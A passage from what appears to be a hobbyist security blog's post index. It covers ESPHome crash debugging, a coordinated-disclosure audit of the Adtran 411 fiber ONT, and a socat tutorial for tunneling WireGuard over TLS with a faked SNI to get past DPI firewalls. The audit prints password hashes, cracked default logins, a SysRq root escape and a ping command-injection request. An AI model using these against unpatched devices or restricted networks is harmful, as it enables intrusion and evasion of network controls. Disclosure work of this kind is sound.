-DCONFIG_ESP32_COREDUMP_CHECKSUM_CRC32=y # Optional: Button to trigger test crashes button: - platform: template name: \u0026#34;Test Crash\u0026#34; id: crash_button on_press: then: - lambda: |- ESP_LOGE(\u0026#34;test\u0026#34;, \u0026#34;Crashing device intentionally!\u0026#34;); int* p = nullptr; *p = 42; Custom Partition Table Create a custom partition table file (custom_partitions_core_dump.csv). This is an example for an ESP32 with 8MB flash:\n# Name, Type, SubType, Offset, Size, Flags nvs, data, nvs, 0x9000, 0x5000, otadata, data, ota, 0xE000, 0x2000, app0, app, ota_0, 0x10000, 0x3C0000, app1, app, ota_1, 0x3D0000, 0x3C0000, eeprom, data, 0x99, 0x790000, 0x1000, coredump, data, coredump, 0x791000, 0x10000, spiffs, data, spiffs, 0x7A1000, 0x5F000 The key addition is the coredump partition which reserves 64KB (0x10000) of flash storage for crash dumps.\nExtracting Coredumps When a crash occurs, the ESP32 will write the coredump to the dedicated partition. To analyze it:\nCopy the firmware ELF file (needed for symbol resolution):\ncp .esphome/build/your-device/.pioenvs/your-device/firmware.elf firmware.elf Extract and analyze the coredump:\nesp-coredump --port /dev/ttyACM0 info_corefile --save-core=my_core_dump.bin --core-format=raw firmware.elf \u0026gt; coredump.txt Save coredump for offline analysis:\n# Extract raw coredump from flash esptool.py --port /dev/ttyACM0 read_flash 0x791000 0x10000 coredump.bin # Erase the coredump partition for next crash esptool.py --port /dev/ttyACM0 erase_region 0x791000 0x10000 # Analyze offline esp-coredump info_corefile --core coredump.bin --core-format=raw firmware.elf Installing ESP-IDF Tools The esp-coredump tool is part of the ESP-IDF framework. Install it by cloning the ESP-IDF repository:\ngit clone --depth 1 --recursive https://github.com/espressif/esp-idf.git cd esp-idf ./install.sh # run this every time to add the esp-idf tools to your PATH . ./export.sh Online Stack Trace Decoder For quick analysis without local ESP-IDF installation, use the ESPHome Stack Trace Decoder web tool. Simply paste your stack trace and firmware ELF file to get decoded function names and line numbers.\nSummary Coredump debugging significantly improves the development experience when working with ESPHome on ESP32 devices. The detailed crash information helps identify issues that would otherwise require extensive trial-and-error debugging. Once configured, coredumps are automatically generated on each crash, overwriting the previous dump.\n","permalink":"https://lanrat.com/posts/esphome-coredump-debugging/","summary":"\u003cp\u003eWhen developing with ESPHome on ESP32 devices, crashes can be frustrating to debug without proper stack traces. Enabling coredumps provides detailed crash information to help identify the root cause of issues.\u003c/p\u003e\n\u003ch2 id=\"configuration\"\u003eConfiguration\u003c/h2\u003e\n\u003cp\u003eTo enable coredump functionality, you\u0026rsquo;ll need to modify your ESPHome configuration and create a custom partition table. This setup is for the Arduino framework - ESP-IDF configurations will differ slightly.\u003c/p\u003e\n\u003ch3 id=\"esphome-configuration\"\u003eESPHome Configuration\u003c/h3\u003e\n\u003cp\u003eAdd the following to your ESPHome YAML configuration:\u003c/p\u003e","title":"ESPHome ESP32 Coredump Debugging"},{"content":"Adtran 411 Security Audit Adtran produces equipment for fiber ISPs. I was provided an Adtran 411 by my current ISP for Internet access and decided to take a deep look into it.\nHardware The Adtran 411 is a small GPON fiber ONT (Optical Network Terminal) designed to give symmetrical gigabit fiber Internet to SOHO users. It connects to the ISP via a GPON uplink and provides the user a normal ethernet RJ-45 connector to plug their router into and a RJ-11 port for a landline to be tunneled over VOIP.\nThe fiber ONT has a Broadcom MIPS CPU that also provides the network card as well.\nThe first step to learning more about the device is to look for any possible UART connections to grab serial logs. If present, the UART can provide boot logs and allow interacting with the device at a low level. Ideally this could also provide access to the bootloader and interact with the OS.\nA UART can be identified by 3-4 pins, which will include Ground, Tx, Rx, and possibly a VCC. The Adtran just happened to have a hidden 4 pin header inside the device. Using a multimeter and logic analyzer revealed the pinout, and was able to provide the boot logs from the device. Amusingly, it can be accessed entirely externally by pushing wires through the vent holes!\nThe UART boot logs revealed that the device uses the uBoot boot loader and runs Linux. Once booted, it prompts for login credentials.\nDumping the Filesystem The hardware contains a NAND flash chip. This acts as the persistent storage for the device. The ideal way is to desolder the NAND flash storage and use an external NAND dumper, however that can risk damaging the device when removing or re-adding the NAND flash from the board.\nThe NAND flash can also be dumped on-device using a much slower method through uBoot. This method involves using the UART serial connection to tell uBoot to load the entire contents of the NAND flash into memory, then read the memory that contains the NAND flash and print the output as hex over the UART serial. While this is running, log all of the serial output and later parse this hex output and reconstruct the binary from flash.\nThis can be done using tools like screen, grep, sed, xxd, etc. Converting from binary to hex+ASCII over a serial connection is incredibly slow. This can be automated with the Python tool bcm-cfedump. It took 15.5 hours to dump 128MB.\nExploring the Filesystem The boot logs contained the partition layout for the NAND flash. We can use dd to carve out the individual partitions from the dump.\ndd bs=1 if=nand.bin of=nvram.bin skip=0 count=131072 dd bs=1 if=nand.bin of=update.bin count=64356352 skip=131072 dd bs=1 if=nand.bin of=rootfs.bin count=64356352 skip=64487424 dd bs=1 if=nand.bin of=data.bin count=4194304 skip=128974848 Next the files from the embedded JFFS2 filesystem can be extracted with the jefferson tool.\nUsers \u0026amp; Passwords With access to the entire flash filesystem, it is possible to read /etc/passwd to get a list of users. Surprisingly this also contained password hashes. On modern Linux systems, passwords are saved in /etc/shadow, but this system had all of the hashes in the passwd file.\nadmin:$1$fiLRvAiv$WhZdXwZIDJ4QvO0XB1fdk0:0:0:Administrator:/:/bin/sh support:$1$g0vSrd8Z$gBnlXTkhvDr4dJrFP0I1n1:0:0:Technical Support:/:/bin/sh user:$1$7GYEnL0B$MbHFofzaMetppUwgKmvfv0:0:0:Normal User:/:/bin/sh nobody:$1$cd1QZr5m$TUd00gjlgEa8C/WZ0RMa9.:0:0:nobody for ftp:/:/bin/sh There were four users, all of which belonged to the root group, gid 0. The password hashes are hashed using the MD5 algorithm as specified by the prefix $1$.\nI was able to crack two of the password hashes using cheap online hash cracking services. This revealed the following two passwords:\nuser:user support:support I\u0026rsquo;m a little embarrassed that I did not guess these passwords initially. It\u0026rsquo;s also very unusual that the nobody user has a password, and has a shell assigned to it. Especially if it\u0026rsquo;s just meant for FTP as designated by the user account name.\nThese credentials worked to login on the UART shell, but more on that later\u0026hellip;\nSysRq There was this SysRq message in the boot logs. SysRq is an abbreviation for System Rq. What is System Rq?\nThe magic SysRq key is a key combination understood by the Linux kernel, which allows the user to perform various low-level commands regardless of the system\u0026rsquo;s state. It is often used to recover from freezes. This key combination provides access to features for disaster recovery.\nThe keystrokes are: [Alt] + [SysRq] + [Command Key], however, over UART in screen: [Ctrl-A] + [Ctrl-B] + [Command Key]. On systems that have SysRq enabled, it\u0026rsquo;s possible to enter a root shell at any time by sending a special keystroke to the device. Sending the command for SIGKILL drops to root shell!\nNetwork Scan The boot logs revealed the device assigns itself a static IP of 192.168.1.1. Statically adding an IP on the same subnet to your machine connected to the ONT over ethernet allows direct network communication. A port scan reveals that there are two services running, HTTP and Telnet.\nTelnet Service The telnet interface drops you into the same restricted shell as UART that requires auth. The passwords collected previously from the filesystem work!\nAfter logging in, you are dropped to a very limited custom CLI. It\u0026rsquo;s not a traditional shell. There are only a few limited debugging commands available like ping. Is it possible to escape this limited shell? Yes!\nTelnet Command Injection The ping command allows for command injection via semicolon (;).\nWeb HTTP Service Accessing the device over the network on port 80 presents a HTTP login form, which the previously collected credentials worked on. Logging in as user provides some limited viewing of settings in the web interface. The access control page makes it clear the admin user has more permissions\u0026hellip;\nFrom the filesystem exploration, it was possible to identify additional hidden web pages that were not linked to in the menus.\n/engdebug.html allows for mirroring network port traffic for debugging\n/packatcapture.html allows for creating PCAP files for any interface.\nThese debug pages provided very privileged access for a non-admin user.\nWeb Command Injection The ping utility has a similar command injection vulnerability as the CLI. You need to use two requests: one to run the command, and another to read the response.\nSending a HTTP GET request to /ping.txt?action=ping\u0026amp;command=cat%20/proc/cpuinfo will initiate the \u0026ldquo;ping\u0026rdquo; command that will actually run the PoC command cat /proc/cpuinfo. The response from that command can later be received by requesting /ping.txt?action=refresh.\nDumping More Credentials There was another hidden HTTP endpoint at dumpsysinfo.html that was accessible from the non-admin user that allows for the creation of a \u0026ldquo;system information dump\u0026rdquo;. This dumps all config with all user passwords to a plain text XML file. Now I have the admin password! The dump also includes SIP and other passwords too.\nControl Plane With live shell access to the device, when plugged in and online, there are lots of internal interfaces online including internal network interfaces, VLANs, and bridges. One of these interfaces is the control plane interface that provides some limited access to the ISP\u0026rsquo;s management network.\nThe main bridge br0 is the customer facing ethernet connection with the 192.168.1.1 IP address. There is also an IP on VLAN 702 on the GPON Fiber interface of 10.8.128.0/19. This is a huge subnet with \u0026gt;8k IPs, likely containing all of the other ISP\u0026rsquo;s customers in this area. I was able to confirm other customers of this ISP could ping hosts on the control plane from behind their ONT.\nAll of the network services (Telnet, HTTP) are listening on all interfaces, including the control-plane. In theory this could allow a customer behind a compromised ONT to compromise other customers remotely. With permission from my ISP I tested this and it does appear that customer to customer ONT traffic is blocked. However, some limited access to other devices on the control plane was accessible, including the gateway, DNS and VOIP server.\nDisclosure None of these findings were the ISP\u0026rsquo;s fault. All issues reside in the firmware for the Adtran ONT. As soon as the ISP was made aware they took steps to make Adtran fix the issues and worked with me to do further testing. This is a security success story.\nFebruary 6, 2024 submitted a support request to Adtran to disclose to February 9, 2024 submitted a 2nd support request to Adtran February 26, 2024 email ISP support to disclose February 29, 2024 heard back from ISP and provided all technical details of all findings ISP acknowledges receiving findings March 1, 2024 ISP gives me permission and access to a test setup to test attacking other ONTs Tests successfully fail. March 7th, 2024 ISP confirms Adtran is addressing the issues October 17th, 2024 Adtran test firmware is pushed to my home ONT for testing I am given preview access to the new firmware and confirm all issues mitigated UART/telnet/HTTP services are all disabled December 30th, 2024 Fixes start rolling out to customers. CVEs (Common Vulnerabilities and Exposures) CVE-2025-22937 debug serial console in Adtran 411 allows SysRq escape to root shell CVE-2025-22938 Weak default passwords in Adtran 411 CVE-2025-22939 command injection in telnet server in Adtran 411 allows remote attacker arbitrary root command execution CVE-2025-22940 web server in Adtran 411 allows unprivileged user to set/read admin password CVE-2025-22941 command injection in web server in Adtran 411 allows remote attacker arbitrary root command execution BSidesSF: Adventures \u0026amp; Findings in ISP Hacking This content was covered in a talk I gave at BSidesSF 2025.\nSlides ","permalink":"https://lanrat.com/posts/adtran-isp-hacking/","summary":"\u003ch1 id=\"adtran-411-security-audit\"\u003eAdtran 411 Security Audit\u003c/h1\u003e\n\u003cp\u003eAdtran produces equipment for fiber ISPs. I was provided an Adtran 411 by my current ISP for Internet access and decided to take a deep look into it.\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"Adtran 411 Front Panel\" loading=\"lazy\" src=\"/posts/adtran-isp-hacking/images/adtran-device-front-panel.webp\"\u003e\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"Adtran 411 Back Panel\" loading=\"lazy\" src=\"/posts/adtran-isp-hacking/images/adtran-device-back-panel.webp\"\u003e\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"Adtran 411 Ports Closeup\" loading=\"lazy\" src=\"/posts/adtran-isp-hacking/images/adtran-device-ports-closeup.webp\"\u003e\u003c/p\u003e\n\u003ch2 id=\"hardware\"\u003eHardware\u003c/h2\u003e\n\u003cp\u003eThe Adtran 411 is a small GPON fiber ONT (Optical Network Terminal) designed to give symmetrical gigabit fiber Internet to SOHO users. It connects to the ISP via a GPON uplink and provides the user a normal ethernet RJ-45 connector to plug their router into and a RJ-11 port for a landline to be tunneled over VOIP.\u003c/p\u003e","title":"Adtran Fiber ISP Hacking"},{"content":"A real-time visualization of day and night regions across the world using accurate solar and lunar positioning calculations. The project renders day/night terminator lines, solar and lunar positions, and smooth twilight gradients on an interactive world map using HTML5 Canvas.\nThe visualization integrates the SunCalc library for astronomical calculations and features optimized pixel-level rendering with support for multiple map projections (Equirectangular and Mercator). Additional features include moon phase visualization, responsive design, timezone customization, and a grayscale mode optimized for e-ink displays. The map updates every minute to reflect current celestial conditions.\n","permalink":"https://lanrat.com/projects/day-night-map/","summary":"\u003cp\u003eA real-time visualization of day and night regions across the world using accurate solar and lunar positioning calculations. The project renders day/night terminator lines, solar and lunar positions, and smooth twilight gradients on an interactive world map using HTML5 Canvas.\u003c/p\u003e\n\u003cp\u003eThe visualization integrates the SunCalc library for astronomical calculations and features optimized pixel-level rendering with support for multiple map projections (Equirectangular and Mercator). Additional features include moon phase visualization, responsive design, timezone customization, and a grayscale mode optimized for e-ink displays. The map updates every minute to reflect current celestial conditions.\u003c/p\u003e","title":"Day Night Map"},{"content":"VLAN Scout discovers active VLANs and their configurations through passive monitoring and active probing. The tool identifies VLAN segments by analyzing network traffic and attempting connections across different VLAN IDs.\nThe implementation supports multiple discovery protocols including DHCP, IPv6 neighbor discovery, LLDP, and CDP. VLAN Scout can operate in both passive monitoring mode to observe existing traffic and active probing mode to test VLAN accessibility and configuration.\n","permalink":"https://lanrat.com/projects/vlan-scout/","summary":"\u003cp\u003eVLAN Scout discovers active VLANs and their configurations through passive monitoring and active probing. The tool identifies VLAN segments by analyzing network traffic and attempting connections across different VLAN IDs.\u003c/p\u003e\n\u003cp\u003eThe implementation supports multiple discovery protocols including DHCP, IPv6 neighbor discovery, LLDP, and CDP. VLAN Scout can operate in both passive monitoring mode to observe existing traffic and active probing mode to test VLAN accessibility and configuration.\u003c/p\u003e","title":"VLAN Scout"},{"content":"Bambu P1S Hacking contains firmware dumps, PCB analysis, and X-ray scans of the Bambu Labs P1S 3D printer\u0026rsquo;s ESP32-S3 controller board. The repository documents reverse engineering efforts to understand the printer\u0026rsquo;s firmware architecture and hardware implementation.\nThe collection includes multiple firmware dumps processed through bin-voter to generate corrected flash images, detailed PCB trace analysis, and hardware documentation. This research provides insights into the printer\u0026rsquo;s embedded systems and potential modification opportunities.\n","permalink":"https://lanrat.com/projects/bambu-p1s-hacking/","summary":"\u003cp\u003eBambu P1S Hacking contains firmware dumps, PCB analysis, and X-ray scans of the Bambu Labs P1S 3D printer\u0026rsquo;s ESP32-S3 controller board. The repository documents reverse engineering efforts to understand the printer\u0026rsquo;s firmware architecture and hardware implementation.\u003c/p\u003e\n\u003cp\u003eThe collection includes multiple firmware dumps processed through bin-voter to generate corrected flash images, detailed PCB trace analysis, and hardware documentation. This research provides insights into the printer\u0026rsquo;s embedded systems and potential modification opportunities.\u003c/p\u003e","title":"Bambu P1S Hacking"},{"content":"Bin Voter reconstructs correct binary files from multiple corrupted firmware dumps by implementing a voting algorithm across byte positions. The tool compares corresponding bytes from multiple binary files and selects the most frequently occurring value at each position.\nThis Python utility is designed for firmware recovery scenarios where multiple partial or corrupted dumps are available but no single dump is completely intact. Bin Voter can recover clean firmware images by leveraging statistical analysis across multiple corrupted sources.\n","permalink":"https://lanrat.com/projects/bin-voter/","summary":"\u003cp\u003eBin Voter reconstructs correct binary files from multiple corrupted firmware dumps by implementing a voting algorithm across byte positions. The tool compares corresponding bytes from multiple binary files and selects the most frequently occurring value at each position.\u003c/p\u003e\n\u003cp\u003eThis Python utility is designed for firmware recovery scenarios where multiple partial or corrupted dumps are available but no single dump is completely intact. Bin Voter can recover clean firmware images by leveraging statistical analysis across multiple corrupted sources.\u003c/p\u003e","title":"Bin Voter"},{"content":"DPRK.team is a satirical website that parodies authoritarian cybersecurity organizations through the fictional \u0026ldquo;Glorious People\u0026rsquo;s Cybersecurity Directorate.\u0026rdquo; The site presents cybersecurity services using exaggerated revolutionary rhetoric and propaganda-style messaging that mimics state-controlled digital security agencies.\nThe project serves as a humorous commentary on totalitarian approaches to cybersecurity and digital sovereignty. The website includes typical corporate sections like services, team profiles, and past work, all delivered through an over-the-top ideological lens that lampoons authoritarian cybersecurity practices and terminology.\n","permalink":"https://lanrat.com/projects/dprk.team/","summary":"\u003cp\u003eDPRK.team is a satirical website that parodies authoritarian cybersecurity organizations through the fictional \u0026ldquo;Glorious People\u0026rsquo;s Cybersecurity Directorate.\u0026rdquo; The site presents cybersecurity services using exaggerated revolutionary rhetoric and propaganda-style messaging that mimics state-controlled digital security agencies.\u003c/p\u003e\n\u003cp\u003eThe project serves as a humorous commentary on totalitarian approaches to cybersecurity and digital sovereignty. The website includes typical corporate sections like services, team profiles, and past work, all delivered through an over-the-top ideological lens that lampoons authoritarian cybersecurity practices and terminology.\u003c/p\u003e","title":"DPRK.team"},{"content":"Tunneling WireGuard over TLS using SNI Domain Fronting There are numerous ways to get unrestricted egress on a restricted network. Here I will demonstrate how to use socat to tunnel a UDP connection over a TLS tunnel with a faked SNI domain in order to bypass network restrictions.\nThis technique works on a restricted network that allows outbound TLS traffic to at least a single domain, but only checks the domain in the TLS Client Hello SNI field, and not the destination IP address. I have found this to be a common setup on many captive portal or restricted networks making use of a DPI firewall to block all other network traffic.\nOnce an UDP tunnel is established, a UDP VPN such as WireGuard can be used to route all traffic unrestricted.\nIn order to test if this strategy would work on a restricted network, make a request to a HTTPS server with fake SNI information and verify that you get a response from the server you make the request to. Not all servers send an HTTP response for hosts they are not responsible for, but most seem to. Even if its an error message, that\u0026rsquo;s enough to verify that the connection successfully egressed the network and reached the destination server. I\u0026rsquo;ve found Cloudflare\u0026rsquo;s 1.1.1.1 does exactly this.\nUse the following command replacing SNI_DOMAIN with the domain you want to test with. Remember, the SNI_DOMAIN needs to be a domain that the network allows HTTPS connections to. If the intended server responds, like the Cloudflare example below, then this method will work.\n$ curl -vk --resolve $SNI_DOMAIN:443:1.1.1.1 \u0026#34;https://$SNI_DOMAIN\u0026#34; \u0026lt;html\u0026gt; \u0026lt;head\u0026gt;\u0026lt;title\u0026gt;403 Forbidden\u0026lt;/title\u0026gt;\u0026lt;/head\u0026gt; \u0026lt;body\u0026gt; \u0026lt;center\u0026gt;\u0026lt;h1\u0026gt;403 Forbidden\u0026lt;/h1\u0026gt;\u0026lt;/center\u0026gt; \u0026lt;hr\u0026gt;\u0026lt;center\u0026gt;cloudflare\u0026lt;/center\u0026gt; \u0026lt;/body\u0026gt; \u0026lt;/html\u0026gt; Server The server only needs to be able to receive inbound network traffic on port 443. Any cheap VPS will do. A WireGuard server is also needed and can run on the same VPS. Setting up a WireGuard server is outside the scope of this post.\nCreating a SSL Certificate The server will need a TLS certificate to use for the TLS connection. Since the SNI information will be fake and the tunneled UDP connection will verify server/client keys, the security of this certificate does not matter too much. But be sure to replace the subj parameters with the desired values.\nopenssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -sha256 -days 3650 -nodes -subj \u0026#34;/C=XX/ST=StateName/L=CityName/O=CompanyName/OU=CompanySectionName/CN=CommonNameOrHostname\u0026#34; Keep the key.pem and cert.pem files safe for use with socat.\nSocat Server The socat server is what listens for inbound TLS connections and forwards the tunneled UDP traffic to the desired host.\nSet the following variables:\nUDP_DEST - Destination host to relay UDP packets to. This will be the address of the WireGuard Server. UDP_DEST_PORT - Destination port for UDP packets. Often 51820 for WireGuard. socat -d \\ OPENSSL-LISTEN:443,fork,reuseaddr,keepalive,cert=\u0026#34;cert.pem\u0026#34;,key=\u0026#34;key.pem\u0026#34;,verify=0,su=nobody,nodelay \\ UDP-SENDTO:\u0026#34;$UDP_DEST:$UDP_DEST_PORT\u0026#34; Client The client is made up of the socat client and WireGuard client which connects to the server through the socat tunnel.\nSocat Client The socat client runs on the client device on the restricted network. It connects to the socat server establishing a TLS connection with a fake SNI domain to trick the firewall to allow the traffic.\nSet the following variables:\nSERVER - The IP or hostname of the server that runs the socat listener. SNI_DOMAIN - The domain to fake traffic to. Set this to an allowed domain to appear in the SNI field of the ClientHello packet. UDP_LISTEN_PORT - UDP port to listen on locally for traffic to relay. Set so something like 51820 if using WireGuard. socat -d -t10 -T10 \\ UDP4-LISTEN:\u0026#34;$UDP_LISTEN_PORT\u0026#34;,fork,bind=127.0.0.1 \\ OPENSSL:\u0026#34;$SERVER\u0026#34;:443,verify=0,snihost=\u0026#34;$SNI_DOMAIN\u0026#34;,keepalive,nodelay Remove bind=127.0.0.1 to have the socat client listen for UDP traffic on all interfaces.\nOptionally, socat can verify the server\u0026rsquo;s certificate, but that is outside the scope of this post and not needed if the tunneled connection does the verification, which is the case for WireGuard.\nWireGuard Client Set the WireGuard MTU to 1280 to account for the smaller packet size allowed due to the overhead of TLS tunneling.\nTraffic destined to the socat SERVER will need to be routed directly and not over the WireGuard interface. This can be achieved by setting the AllowedIPs in the WireGuard config to exclude the IP of the socat server. If the socat client is on a different host than the WireGuard client, the socat client\u0026rsquo;s IP will need to be excluded from AllowedIPs as well.\nTools like the WireGuard AllowedIPs Calculator can generate the AllowedIPs section of the WireGuard config to exclude a few select IPs and route everything else through the tunnel.\nNote Other services that may be listening on other ports the server will likely still be inaccessible.\nResults Tunnel Speedtest: Normal Speedtest: It\u0026rsquo;s not pretty, but it works.\nEDIT 2025-05-28: Added information for testing with curl and WireGuard AllowedIPs.\n","permalink":"https://lanrat.com/posts/sni-domain-fronting-vpn/","summary":"\u003ch1 id=\"tunneling-wireguard-over-tls-using-sni-domain-fronting\"\u003eTunneling WireGuard over TLS using SNI Domain Fronting\u003c/h1\u003e\n\u003cp\u003eThere are numerous ways to get unrestricted egress on a restricted network. Here I will demonstrate how to use \u003ca href=\"https://linux.die.net/man/1/socat\"\u003esocat\u003c/a\u003e to tunnel a UDP connection over a TLS tunnel with a faked \u003ca href=\"https://en.wikipedia.org/wiki/Server_Name_Indication\"\u003eSNI\u003c/a\u003e domain in order to bypass network restrictions.\u003c/p\u003e\n\u003cp\u003eThis technique works on a restricted network that allows outbound TLS traffic to at least a single domain, but only checks the domain in the TLS Client Hello SNI field, and not the destination IP address. I have found this to be a common setup on many captive portal or restricted networks making use of a \u003ca href=\"https://en.wikipedia.org/wiki/Deep_packet_inspection\"\u003eDPI\u003c/a\u003e firewall to block all other network traffic.\u003c/p\u003e","title":"SOCAT and WireGuard: a perfect pair for DPI Bypass"},{"content":"This post outlines the process to replace a Tuya radio module with one running ESPHome to fully control a heated mattress pad locally with Home Assistant.\nI purchased a Sunbeam Heated Mattress Pad for those cold winter nights. The mattress pad controller connects to WiFi and has a remote control app. However, it has a safety feature that limits functionality. The app can only adjust heat levels and turn the pad off unless you\u0026rsquo;ve recently pressed a physical button on the controller, effectively limiting the app to changing heat levels and turning the device off.\nI wondered about the usefulness of an app to control your bed temperature when you\u0026rsquo;re already lying next to the controller\u0026rsquo;s ON button. But I suppose some people prefer using their phone, which is likely already in hand, rather than reaching for a button on the nightstand.\nLocal Control For better security and privacy, I explored ways to control the heated mattress pad through my Home Assistant instance.\nThe controller uses the Tuya IoT platform, which can integrate with Home Assistant through the unofficial LocalTuya integration. While setup required registering with the Tuya API and initially connecting the device to the Internet, once configured, I could firewall the controller from the Internet while maintaining full control through Home Assistant. This solution worked well for a while.\nCustom Firmware I eventually wanted more comprehensive local control and the ability to fully integrate the device with my other Home Assistant automations. For example, preheating the bed at bedtime when the outside temperature drops below a certain point. This meant bypassing the physical button restriction. I also wanted to remove my reliance on the unofficial LocalTuya integration and use a native integration.\nEnter ESPHome, an open source firmware for embedded devices (primarily ESP32 chips, though others are supported) that integrates natively with Home Assistant.\nTuya Architecture Tuya devices use a two-part system: a main MCU handling device functionality and a separate chip managing WiFi/Bluetooth and cloud operations. These chips communicate via a UART serial protocol.\nThe mattress pad\u0026rsquo;s radio MCU is the WBR3. It contains a RTL8720CF chip and supports some third-party firmware through LibreTiny, but not native ESPHome support yet. This meant physically replacing the radio module with an ESPHome-compatible one will be required. While others have replaced Tuya radios before, each device presents unique challenges.\nFortunately, the ESP-12 has an almost identical pinout to the WBR3, making it a suitable replacement. Despite its name, the ESP-12 is actually an ESP8266 chip.\nInitial ESP-12 Flashing The bare ESP-12 lacks common dev-board features like a USB port, USB-to-Serial chip, boot button, or power regulator. Initial programming requires a specific wiring configuration to a serial adapter, though subsequent updates can be done wirelessly via OTA.\nHere\u0026rsquo;s the required wiring for the initial programming over UART:\n[ESP] [UART] TX ------ RX RX ------ TX EN ------ RTS GPIO0 ---- DTR GPIO15 --- GND GND ------ GND VCC ------ 3.3v GPIO15 needs to be pulled to ground for normal operations and for serial programming. So I permanently bridged GPIO15 to the neighboring GND pin.\nAfter connecting the ESP-12 to my USB UART adapter, I flashed a basic minimal ESPHome configuration to enable network connectivity and OTA updates.\nAdding the ESP Radio Even though the ESP-12 is pin compatible with the WBR3, and can be replaced directly with it, I decided to keep the original Tuya module just in case it was ever needed in the future, and more importantly, remove the risk of breaking something in the desoldering process.\nTo disable the WBR3 without removing it, I grounded its EN (enable) pin, keeping the WBR3 permanently off and preventing conflicts with the ESP-12 when communicating over the now shared UART.\nI then connected the ESP-12 to the UART Tx, Rx, 3.3v, GND, and added a connection from GPIO5 to the presence button on the control panel.\nThe ESP-12 now effectively replaces the WBR3, handling all UART communication and drawing power from the WBR3\u0026rsquo;s voltage regulator. As a bonus, it can simulate physical button presses via the GPIO line, bypassing the presence check requirement.\nWarning The control unit has the low voltage negative/ground plane connected directly to mains neutral! While this “works” it is considered unsafe and potentially dangerous. This effectively means that when the device is connected to mains AC power, mains current may be flowing through the low voltage components, even when off. Since voltage is relative, they will work just fine as long as nothing else connects to the low voltage components not expecting mains neutral on the ground plane! As a result, if you want to debug with UART, or flash the ESP, you MUST do it with the mains plug fully disconnected! I learned this the hard way. I fried a USB-UART adapter which did not appreciate the mains power surging through it. After this happened I mapped out the traces on the PCB to discover this design flaw. As long as mains power is connected, do not let anything external interact with the device! Ever.\nFinally, I secured the new ESP-12 by hot-gluing it directly over the disabled WBR3.\nESPHome Configuration ESPHome includes a component for the Tuya UART protocol. I just needed to identify the correct data point numbers and types. Fortunately, these matched the data points already used by the LocalTuya integration, and are documented in this Home Assistant Community thread.\nTo automatically bypass the physical button requirement, I programmed ESPHome to toggle GPIO5, simulating a button press before activating the mattress pad. I also simplified the interface by replacing Tuya\u0026rsquo;s drop-down menus with more intuitive controls in Home Assistant, such as using a slider for heat levels instead of select menus.\nYou can view my ESPHome configuration below.\nCode Full ESPHome Config substitutions: node_name: mattress esphome: name: ${node_name} friendly_name: Mattress esp8266: board: esp12e # the board is a ESP-12F, but this is close enough wifi: ssid: !secret wifi_name password: !secret wifi_password ap: ssid: ${node_name} AP password: !secret hotspot_password # fallback mechanism for when connecting to the configured WiFi fails. captive_portal: # Enable Home Assistant API api: encryption: key: !secret api_encryption_key ota: - platform: esphome password: !secret ota_password time: - platform: homeassistant id: time_hass logger: baud_rate: 0 # (UART logging interferes with tuya) web_server: port: 80 include_internal: true status_led: pin: number: GPIO2 inverted: true uart: rx_pin: RX #GPIO3 tx_pin: TX #GPIO1 baud_rate: 9600 # https://esphome.io/components/tuya tuya: time_id: time_hass binary_sensor: - platform: status name: Status sensor: - platform: wifi_signal name: WiFi Signal update_interval: 10s filters: - throttle_average: 60s # node uptime sensor - platform: uptime name: Boot Time id: uptime_sensor icon: mdi:clock-start type: timestamp - platform: \u0026#34;tuya\u0026#34; name: Side A Auto Off Timer sensor_datapoint: 28 icon: mdi:timer-stop-outline entity_category: diagnostic unit_of_measurement: seconds - platform: \u0026#34;tuya\u0026#34; name: Side B Auto Off Timer sensor_datapoint: 29 icon: mdi:timer-stop-outline entity_category: diagnostic unit_of_measurement: seconds switch: # Master - platform: \u0026#34;tuya\u0026#34; id: master_power_sw switch_datapoint: 1 restore_mode: DISABLED internal: true on_turn_off: - switch.turn_off: master_preheat_sw - platform: template name: \u0026#34;Master Power\u0026#34; icon: mdi:car-seat-heater lambda: |- return id(master_power_sw).state; turn_on_action: - switch.turn_on: activity_btn - delay: 0.5s - switch.turn_on: master_power_sw turn_off_action: - switch.turn_off: master_power_sw - platform: \u0026#34;tuya\u0026#34; name: \u0026#34;Master Preheat Power\u0026#34; switch_datapoint: 8 icon: mdi:fire id: master_preheat_sw restore_mode: DISABLED # Side A - platform: \u0026#34;tuya\u0026#34; id: side_a_power_sw switch_datapoint: 14 restore_mode: DISABLED internal: true on_turn_off: - switch.turn_off: side_a_preheat_sw - platform: template name: \u0026#34;Side A Power\u0026#34; icon: mdi:car-seat-heater lambda: |- return id(side_a_power_sw).state; turn_on_action: - switch.turn_on: activity_btn - delay: 0.5s - switch.turn_on: side_a_power_sw turn_off_action: - switch.turn_off: side_a_power_sw - platform: \u0026#34;tuya\u0026#34; name: \u0026#34;Side A Preheat\u0026#34; switch_datapoint: 24 icon: mdi:fire restore_mode: DISABLED id: side_a_preheat_sw # Side B - platform: \u0026#34;tuya\u0026#34; id: side_b_power_sw switch_datapoint: 15 restore_mode: DISABLED internal: true on_turn_off: - switch.turn_off: side_b_preheat_sw - platform: template name: \u0026#34;Side B Power\u0026#34; icon: mdi:car-seat-heater lambda: |- return id(side_b_power_sw).state; turn_on_action: - switch.turn_on: activity_btn - delay: 0.5s - switch.turn_on: side_b_power_sw turn_off_action: - switch.turn_off: side_b_power_sw - platform: \u0026#34;tuya\u0026#34; name: \u0026#34;Side B Preheat\u0026#34; switch_datapoint: 25 icon: mdi:fire restore_mode: DISABLED id: side_b_preheat_sw - platform: gpio pin: number: GPIO5 inverted: true id: activity_btn name: \u0026#34;Activity Button\u0026#34; entity_category: diagnostic internal: true on_turn_on: - delay: 500ms - switch.turn_off: activity_btn number: - platform: template name: \u0026#34;Side A Level\u0026#34; id: side_a_level step: 1 min_value: 1 max_value: 10 update_interval: never entity_category: config icon: mdi:thermometer lambda: |- return std::stoi(id(side_a_level_int).state.substr(6)); set_action: then: - select.set: id: side_a_level_int option: !lambda return \u0026#34;Level \u0026#34; + std::to_string(int(x)); - platform: template name: \u0026#34;Side B Level\u0026#34; id: side_b_level step: 1 min_value: 1 max_value: 10 update_interval: never entity_category: config icon: mdi:thermometer lambda: |- return std::stoi(id(side_b_level_int).state.substr(6)); set_action: then: - select.set: id: side_b_level_int option: !lambda return \u0026#34;Level \u0026#34; + std::to_string(int(x)); - platform: template name: \u0026#34;Master Heat Level\u0026#34; id: master_level step: 1 min_value: 1 max_value: 10 update_interval: never 